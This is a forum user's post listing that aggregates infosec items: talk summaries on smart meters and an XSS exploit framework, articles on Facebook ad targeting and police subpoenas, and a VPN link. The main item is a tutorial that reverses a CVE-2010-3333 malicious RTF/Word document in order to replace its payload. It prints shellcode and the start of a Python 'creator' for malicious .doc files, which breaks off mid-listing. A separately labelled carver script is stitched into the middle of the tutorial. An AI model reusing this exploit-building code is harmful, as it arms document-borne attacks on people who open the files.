Everything posted by Nytro
-
Smartmeter

Description: SMARTMETER: A technological overview of the German roll-out. This talk will give an overview of the technology, the laws and the technical guidelines of the smart meter roll-out in Germany. Smart meters are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation failures, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planned roll-out and the laws and technical guidelines. The “Energiewirtschaftsgesetz” (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the “Bundesministerium für Wirtschaft und Technologie” (BMWi), which delegates the task of defining the technical details to the “Bundesamt für Sicherheit in der Informationstechnik” (BSI). The BSI is therefore in the process of developing a so-called protection profile (PP) (or Common Criteria) for smart meter gateways and the security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication-related details of the whole smart meter infrastructure have to be implemented to provide security and interoperability. This talk will present the different roles defined by the TR and PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further, the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Smartmeter
-
At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2

Description: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2. Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2
-
[h=1]How social networks like Facebook want to make money[/h]

Reaching millions of consumers (potential customers)

There are many ways to reach a given audience in marketing. Among them is drawing up a questionnaire to get to know your own customer base better, and to learn in which media to advertise your product so as to sell it best. For example, if you sell a new tractor for a farm, you will advertise it in a magazine bought mainly by farmers. That way you cover a market segment that will give you the largest sales volume.

The Internet and cookies

If I have software that analyses how often farmers in a given territory make purchases... for example, I can plant cookies on a website that sells tractors online, to record where the people who visit the site come from, who sells or buys these tractors, and so on. If you used my services, I could tell you which agricultural fair you should go to for the best chance of selling your tractors. That is because my cookies have detected many potential customers in that area. How much would you be willing to pay for such a marketing service? The investment needed to find potential customers would shrink enormously, because you would not have to hire an army of salespeople to prospect the market for years and years. So Facebook, and social networks in general, use such cookies, or could use them, to find the buyers of various products, whether luxury goods or everyday items. And businesses would only need to buy these lists. Such lists are available from advertising agencies all over the world. They have an initial price that varies according to the market you want to address.

The more specialised the list, the more it costs to create and the higher its selling price. A basic list, with name, surname, address, telephone number, etc., costs about 40 dollars per 1000 potential customers in the USA. A list with information such as occupation, city of residence, the number of properties acquired over a lifetime, the buyers' lifestyle, etc., has an average price of about 120 dollars per 1000 potential customers, again in the USA. Today Facebook goes even further, thanks to cookies and consumers' buying habits. This allows millions of people to be precisely targeted, with 500% greater reliability, because Facebook can use word-recognition software on its own site. For example, the software can track everyone who has used the words Mercedes Benz in their posts. Facebook can thus build an extremely precise marketing list. And of course the price of such a list goes up. Imagine you are on Facebook, chatting with your brother or a brother-in-law, and at some point you say: "Yes, I'm thinking of buying a new car, a Mercedes Benz, in a couple of days." The software retrieves your name, your user name, the city you live in, your occupation and any other relevant information to work out which car dealership you might buy the car from. A Facebook representative calls that dealership and agrees to provide it with this information for a sum of money. You receive a call from the dealership in question, inviting you to take advantage of an offer you can't refuse... And so we have an extremely precisely targeted kind of marketing. And this practice will bring Facebook billions of dollars in revenue.

Such a list can reach 2500 or even more than 5000 dollars per 1000 potential customers, multiplied, of course, by the number of Facebook users. Facebook will obviously also set up partnerships and links with other sites, recommend purchases to its members through other sites, and the like (indirect marketing). You can get at least a small idea of the wealth this company holds. And this process is about to be implemented by every social network that exists on the web today.

Source: Cum vor sa castige bani retelele sociale precum Facebook
-
[h=4]Which VPN Service Providers Really Take Anonymity Seriously?[/h]

If you're doing "stuff" anyway, don't take risks. Use at least a VPN (like the ones here). If that's not OK, then Tor.

Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/
-
When the cops subpoena your Facebook information, here's what Facebook sends the cops

The information is NOT new, but I find it useful.

Published Apr 06 2012, 08:30 AM by Carly Carioli

-- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case. One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act. In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data. This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information.

And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook IDs were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it:

You'll find the PDF here: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx
-
Reversing a Malicious Word Document

Anonymous, January 04, 2013

In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, provided an exploit sample is available. I have taken exploit sample CVE-2010-3333 in order to complete this exercise. So let's first explore this document (Laden's Death.doc) to see whether it's an exploit or not by just looking at it in a hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the pFragment parameter and look for something suspicious. When I opened the document in hex, I found something suspicious as an address in the pFragment parameter, and that is bc41db77; let's search for this address in the debugger (77db41bc): Address not found. That's why, when I executed this sample, it crashed, as shown in the following picture. Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it's crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of XP SP2, but I am using XP SP3, so this address is not available. It can be made workable on XP SP3 by taking any address from the XP SP3 DLL. I took the 'jmp esp' address from kernel32.dll and replaced it with 7b46867c (jmp esp address of kernel32.dll, XP Service Pack 3). Then it worked fine. When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it.

C:/RECYCLER/server.exe does the following:
• Drops a file in the system's temp folder: vmm2.tmp
• File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll
• Makes registry modifications in an attempt to hijack the DHCP service

The payload has the ability to:
• Download additional malware
• Connect and send sensitive data back to remote servers
• Act as a trojan proxy server

So let me first analyze the shell code for server.exe; there are actually two ways to analyze it: 1) in a hex editor, 2) in a debugger. Let me open the sample in the hex editor and try to find the shell code for server.exe. While analyzing in hex, we found something suspicious; that is, the address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure. After a deep analysis, we found that the shell code has been encrypted by an 8-bit EE XOR, as in the instruction XOR BYTE PTR DS:[EDX+ECX], 0EE. Also, the encryption begins from last to start, that is, from eeeeeeee to the start of the shell code. Now it's time to replace the full shell code with your own code. I have the following shell code that will execute calc from our server:

eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83.

So I will replace the existing shell code with our own code. After replacing, the sample looks like this: Now, after executing it, it should execute calc. Wow, calc pops up. Now it's time to analyze the dropped DLL, which has been dropped into system32 with the name dhcpsrv.dll. After analyzing, we see that the exploit sample is dropping dhcpsrv.dll into the c:\windows\system32 folder, as in the picture, and that it is going to be executed by rundll32.exe.
We will analyze the dropped DLL (dhcpsrv.dll) further, but first we have to attach it to the debugger. There is a process for attaching the debugger. I am going to attach it to WinWord, as it is an Office document file. After attaching and before executing, we have to set breakpoints (F2) in the debugger on various Win32 functions. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions on which it is desirable to set a breakpoint before reversing. They are: CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLibrary, etc. After setting a breakpoint, we have to Step Over (F8) in the debugger and, while doing this, we will have to look carefully for some suspicious address in the stack window of the debugger (bottom right). We mainly analyze the LoadLibrary function as well and, while analyzing, we look to see if any library or any function gets loaded from some suspicious address (“suspicious” means an address that does not belong to the kernel). After a long analysis, we find that the CreateFile function gets loaded at a suspicious address (0011f438). A point to be noted is that this address may change from computer to computer. In the above picture, look at the stack window. There is a call to the CreateFileA function from address 0011F438. Now our next task is to start analyzing from this address, so we will set a breakpoint at 0011F438.

Now our main job should be to find the actual location of the embedded DLL/EXE, that is, the start location, the end location and the size of the EXE/DLL, and the algorithm by which the EXE/DLL has been encrypted. To do that, we will start analyzing line by line from the beginning of the suspicious address. We find the following instructions:

0011F54E AC    LODS BYTE PTR DS:[ESI]
0011F54F 3C 00 CMP AL, 0
0011F551 74 06 JE SHORT 0011F559
0011F553 3C FC CMP AL, 0FC
0011F555 74 02 JE SHORT 0011F559
0011F557 34 FC XOR AL, 0FC
0011F559 AA    STOS BYTE PTR ES:[EDI]
0011F55A E2 F2 LOOPD SHORT 0011F54E

Let's look at two of these instructions. The instruction 0011F54E AC LODS BYTE PTR DS:[ESI] reads the byte at the address stored in ESI and stores its value in EAX, while the instruction 0011F559 AA STOS BYTE PTR ES:[EDI] stores the value of EAX at EDI. So the encryption algorithm is to read each byte of the EXE; if it is 0 or 0FC then leave it as it is, if not then XOR it with 0FC, as in the instruction 0011F557 34 FC XOR AL, 0FC. So we found the encryption. The next step is to find the start, end, and size of the EXE. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in the dump window: there is some sequence of values with ASCII 6161616161, etc.; let's search for this value in the hex of the exploit sample. While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in the dump), so let's move into hex to decrypt the value and try to find MZ (as MZ is the start header of the PE file). If MZ is found, it indicates that this is the beginning of the EXE. Now what is the total size of the EXE? For that, we have to check the file that's dropped into c:/windows/system32, dhcpsrv.dll, open it in the hex editor, and find the total size; this will be the total size of the EXE/DLL. We find that the total size of the DLL is ADD8 in hex, 44504 in decimal.
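The conditional XOR loop and the MZ search described above, as an added example that is not part of the original article: a Python carver that decodes the bytes after the }}}} marker with the same rule (0x00 and 0xFC pass through, everything else is XORed with 0xFC), validates the MZ/PE header, and takes the file size from the PE section table instead of measuring the dropped dhcpsrv.dll. The marker and the key are the ones the article reports; the sample and the minimal PE skeleton inside it are constructed here for the test, and the carver tries every marker occurrence, so it also handles braces that appear earlier in the RTF.

```python
"""Carve an embedded executable hidden with the conditional XOR seen in the
disassembly: bytes 0x00 and 0xFC are copied unchanged, every other byte is
XORed with 0xFC. The payload follows the four closing braces "}}}}" noted
in the dump window. Test data below is constructed; no real sample is used."""
import struct
from typing import Optional

XOR_KEY = 0xFC       # key from "XOR AL, 0FC"
MARKER = b"}}}}"     # the four curly braces that precede the encoded payload


def decode_conditional_xor(data: bytes, key: int = XOR_KEY) -> bytes:
    """Undo the loader's transform. 0x00 and the key byte pass through,
    everything else is XORed with the key. Since x ^ key is never 0x00 or
    key for any other x, the mapping is its own inverse."""
    return bytes(b if b in (0, key) else b ^ key for b in data)


def pe_image_size(data: bytes) -> Optional[int]:
    """Size of the PE file starting at data[0], derived from its section
    table (end of the last raw section), or None if the header is not a
    plausible PE. This avoids guessing the size from a dropped copy."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    sect_off = e_lfanew + 24 + opt_size
    end = sect_off + 40 * num_sections          # at least the whole section table
    for i in range(num_sections):
        off = sect_off + 40 * i
        if off + 40 > len(data):
            return None
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        end = max(end, raw_ptr + raw_size)
    return end if end <= len(data) else None


def carve_embedded_pe(sample: bytes, marker: bytes = MARKER) -> Optional[bytes]:
    """Try every marker occurrence: decode what follows it, check for a
    valid MZ/PE header and return exactly the embedded file's bytes."""
    pos = sample.find(marker)
    while pos != -1:
        decoded = decode_conditional_xor(sample[pos + len(marker):])
        size = pe_image_size(decoded)
        if size:
            return decoded[:size]
        pos = sample.find(marker, pos + 1)
    return None


def build_test_pe(payload: bytes) -> bytes:
    """Constructed minimal PE32 skeleton (DOS header, PE signature, COFF
    header, zeroed 224-byte optional header, one section) that exists only
    to exercise the carver. It is not a runnable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)             # e_lfanew
    opt_size = 224
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    sect_off = 0x40 + len(coff) + opt_size
    raw_ptr = (sect_off + 40 + 0x1FF) & ~0x1FF          # 0x200 file alignment
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", len(payload), 0x1000, len(payload), raw_ptr,
        0, 0, 0, 0, 0x60000020)
    pe = bytes(dos) + coff + bytes(opt) + section
    return pe + b"\0" * (raw_ptr - len(pe)) + payload


# Constructed sample: an RTF-looking prefix ending in "}}}}", then the encoded
# PE (the transform is an involution, so the decoder also encodes), then junk.
PAYLOAD = b"constructed section body, not real code " * 4
EMBEDDED_PE = build_test_pe(PAYLOAD)
SAMPLE = (b"{\\rtf1\\ansi{\\fonttbl{\\f0\\fnil Times New Roman;}}{\\*\\sv{{}}}}"
          + decode_conditional_xor(EMBEDDED_PE)
          + b"aaaaaaaaaaaa}")

if __name__ == "__main__":
    carved = carve_embedded_pe(SAMPLE)
    print("carved", len(carved) if carved else None, "bytes;",
          "matches embedded PE:", carved == EMBEDDED_PE)
```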
So now we have found:
• the encryption algorithm
• the start location of the DLL/EXE
• the end location of the DLL/EXE

Now our main job is to write the creator with the proper encryption key and the start and end locations. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below. The point where MZ is found is the start point of the EXE. Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in system32 (the DLL file). So now it's time to write the full creator code that I have written in Python. Here is the full creator:

import datetime
import os
header = ("\x7B\x5C\x72\x74\x66\x31\x5C\x61\x64\x65\x66\x6C\x61\x6E\x67\x31"
"\x30\x32\x35\x5C\x61\x6E\x73\x69\x5C\x61\x6E\x73\x69\x63\x70\x67"
"\x39\x33\x36\x5C\x75\x63\x32\x5C\x61\x64\x65\x66\x66\x30\x5C\x64"
"\x65\x66\x66\x30\x5C\x73\x74\x73\x68\x66\x64\x62\x63\x68\x31\x33"
"\x5C\x73\x74\x73\x68\x66\x6C\x6F\x63\x68\x30\x5C\x73\x74\x73\x68"
"\x66\x68\x69\x63\x68\x30\x5C\x73\x74\x73\x68\x66\x62\x69\x30\x5C"
"\x64\x65\x66\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x64\x65\x66\x6C"
"\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x7B\x5C\x66\x6F\x6E\x74\x74"
"\x62\x6C\x7B\x5C\x66\x30\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63"
"\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A"
"\x5C\x70\x61\x6E\x6F\x73\x65\x20\x30\x32\x30\x32\x30\x36\x30\x33"
"\x30\x35\x30\x34\x30\x35\x30\x32\x30\x33\x30\x34\x7D\x54\x69\x6D"
"\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x3B\x7D\x7B\x5C"
"\x66\x31\x33\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65"
"\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61"
"\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30"
"\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x5C\x27\x63\x62\x5C\x27"
"\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x7B\x5C\x2A\x5C\x66\x61" "\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D\x3B\x7D\x0D\x0A\x7B\x5C" "\x66\x33\x36\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x40\x5C\x27\x63\x62\x5C" "\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x3B\x7D\x7B\x5C\x66" "\x33\x37\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73" "\x65\x74\x32\x33\x38\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65" "\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43\x45\x3B\x7D" "\x7B\x5C\x66\x33\x38\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x32\x30\x34\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43" "\x79\x72\x3B\x7D\x7B\x5C\x66\x34\x30\x5C\x66\x72\x6F\x6D\x61\x6E" "\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36\x31\x5C\x66\x70\x72" "\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D" "\x61\x6E\x20\x47\x72\x65\x65\x6B\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34" "\x31\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x36\x32\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73" "\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x54\x75\x72\x3B\x7D" "\x7B\x5C\x66\x34\x32\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x37\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x48\x65\x62\x72\x65\x77\x29\x3B\x7D" "\x7B\x5C\x66\x34\x33\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x38\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x41\x72\x61\x62\x69\x63\x29\x3B\x7D" "\x7B\x5C\x66\x34\x34\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" 
"\x61\x72\x73\x65\x74\x31\x38\x36\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x42" "\x61\x6C\x74\x69\x63\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34\x35\x5C\x66" "\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36" "\x33\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65" "\x77\x20\x52\x6F\x6D\x61\x6E\x20\x28\x56\x69\x65\x74\x6E\x61\x6D" "\x65\x73\x65\x29\x3B\x7D\x7B\x5C\x66\x31\x36\x39\x5C\x66\x6E\x69" "\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71" "\x32\x20\x53\x69\x6D\x53\x75\x6E\x20\x57\x65\x73\x74\x65\x72\x6E" "\x7B\x5C\x2A\x5C\x66\x61\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D" "\x3B\x7D\x7B\x5C\x66\x33\x39\x39\x5C\x66\x6E\x69\x6C\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x20\x40\x5C" "\x27\x63\x62\x5C\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x20" "\x57\x65\x73\x74\x65\x72\x6E\x3B\x7D\x7D\x7B\x5C\x63\x6F\x6C\x6F" "\x72\x74\x62\x6C\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E" "\x30\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72" "\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65" "\x64\x30\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65" "\x32\x35\x35\x3B\x0D\x0A\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65" "\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32" "\x35\x35\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35" "\x35\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x30" "\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67" "\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72" "\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62" "\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65" "\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64" "\x30\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x31" "\x32\x38\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E\x31\x32" 
"\x38\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C" "\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C" "\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C" "\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65" "\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x30\x3B\x0D\x0A\x5C\x72\x65" "\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C" "\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64\x31\x39\x32\x5C\x67\x72" "\x65\x65\x6E\x31\x39\x32\x5C\x62\x6C\x75\x65\x31\x39\x32\x3B\x7D" "\x7B\x5C\x73\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x7B\x5C\x71\x6A" "\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C\x6E\x6F\x77\x69\x64\x63" "\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C" "\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75" "\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72" "\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69" "\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32\x34\x5C\x61\x6C\x61\x6E" "\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C\x6C\x61\x6E\x67\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x5C\x6B\x65" "\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63\x68\x5C\x66\x30\x5C\x68" "\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63\x68\x5C\x61\x66\x31" "\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C\x61\x6E\x67\x6E\x70\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x6E\x70\x32\x30\x35\x32\x20" "\x5C\x73\x6E\x65\x78\x74\x30\x20\x4E\x6F\x72\x6D\x61\x6C\x3B\x7D" "\x7B\x5C\x2A\x5C\x63\x73\x31\x30\x20\x5C\x61\x64\x64\x69\x74\x69" "\x76\x65\x20\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20" "\x44\x65\x66\x61\x75\x6C\x74\x20\x50\x61\x72\x61\x67\x72\x61\x70" "\x68\x20\x46\x6F\x6E\x74\x3B\x7D\x7B\x5C\x2A\x0D\x0A\x5C\x74\x73" "\x31\x31\x5C\x74\x73\x72\x6F\x77\x64\x5C\x74\x72\x66\x74\x73\x57" 
"\x69\x64\x74\x68\x42\x33\x5C\x74\x72\x70\x61\x64\x64\x6C\x31\x30" "\x38\x5C\x74\x72\x70\x61\x64\x64\x72\x31\x30\x38\x5C\x74\x72\x70" "\x61\x64\x64\x66\x6C\x33\x5C\x74\x72\x70\x61\x64\x64\x66\x74\x33" "\x5C\x74\x72\x70\x61\x64\x64\x66\x62\x33\x5C\x74\x72\x70\x61\x64" "\x64\x66\x72\x33\x5C\x74\x72\x63\x62\x70\x61\x74\x31\x5C\x74\x72" "\x63\x66\x70\x61\x74\x31\x5C\x74\x62\x6C\x69\x6E\x64\x30\x5C\x74" "\x62\x6C\x69\x6E\x64\x74\x79\x70\x65\x33\x5C\x74\x73\x63\x65\x6C" "\x6C\x77\x69\x64\x74\x68\x66\x74\x73\x30\x5C\x74\x73\x76\x65\x72" "\x74\x61\x6C\x74\x5C\x74\x73\x62\x72\x64\x72\x74\x5C\x74\x73\x62" "\x72\x64\x72\x6C\x5C\x74\x73\x62\x72\x64\x72\x62\x5C\x74\x73\x62" "\x72\x64\x72\x72\x5C\x74\x73\x62\x72\x64\x72\x64\x67\x6C\x5C\x74" "\x73\x62\x72\x64\x72\x64\x67\x72\x5C\x74\x73\x62\x72\x64\x72\x68" "\x5C\x74\x73\x62\x72\x64\x72\x76\x20\x0D\x0A\x5C\x71\x6C\x20\x5C" "\x6C\x69\x30\x5C\x72\x69\x30\x5C\x77\x69\x64\x63\x74\x6C\x70\x61" "\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73" "\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61" "\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74" "\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30" "\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66" "\x30\x5C\x61\x66\x73\x32\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66" "\x63\x73\x30\x20\x5C\x66\x73\x32\x30\x5C\x6C\x61\x6E\x67\x31\x30" "\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65\x31\x30\x32\x34\x5C\x6C\x6F" "\x63\x68\x5C\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x31\x30\x32\x34\x20\x5C\x73\x6E\x65\x78\x74\x31\x31\x20" 